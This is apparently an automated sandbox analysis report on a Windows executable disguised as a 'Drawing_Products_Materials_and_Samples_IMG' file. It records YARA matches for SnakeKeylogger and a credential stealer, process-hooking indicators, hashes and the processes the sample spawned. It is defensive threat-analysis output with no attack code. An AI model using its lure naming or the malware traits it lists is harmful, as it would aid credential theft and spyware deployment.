                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37410CC02_2_37410CC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37413EC02_2_37413EC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374170C82_2_374170C8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374128D02_2_374128D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37415AD52_2_37415AD5
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374128E02_2_374128E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37415AE02_2_37415AE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374112F12_2_374112F1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374176F82_2_374176F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3741C0F82_2_3741C0F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374106802_2_37410680
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374138802_2_37413880
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37416A882_2_37416A88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374122902_2_37412290
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374154902_2_37415490
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374122A02_2_374122A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374154A02_2_374154A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37410CB12_2_37410CB1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37413EB22_2_37413EB2
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374170B92_2_374170B9
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37585E482_2_37585E48
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375849702_2_37584970
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375820082_2_37582008
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37582DD02_2_37582DD0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375826F02_2_375826F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375842882_2_37584288
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375834B82_2_375834B8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37583BA02_2_37583BA0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375800402_2_37580040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375842782_2_37584278
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375849602_2_37584960
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37582DC12_2_37582DC1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37581FF82_2_37581FF8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375826E12_2_375826E1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37583B902_2_37583B90
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37581C882_2_37581C88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375812B02_2_375812B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375834AA2_2_375834AA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_375812A62_2_375812A6
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll 3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                Source: Drawing_Products_Materials_and_Samples_IMG.exeStatic PE information: invalid certificate
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878173364.0000000036939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878264779.000000003694D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@4/5
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_004042CA GetDlgItem,SetWindowTextA,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_004042CA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,0_2_00402036
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\Documents\Udrjestes36Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\AppData\Local\Temp\nso8152.tmpJump to behavior
                Source: Drawing_Products_Materials_and_Samples_IMG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Drawing_Products_Materials_and_Samples_IMG.exeReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile read: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: windows.storage.dllJump to behavior
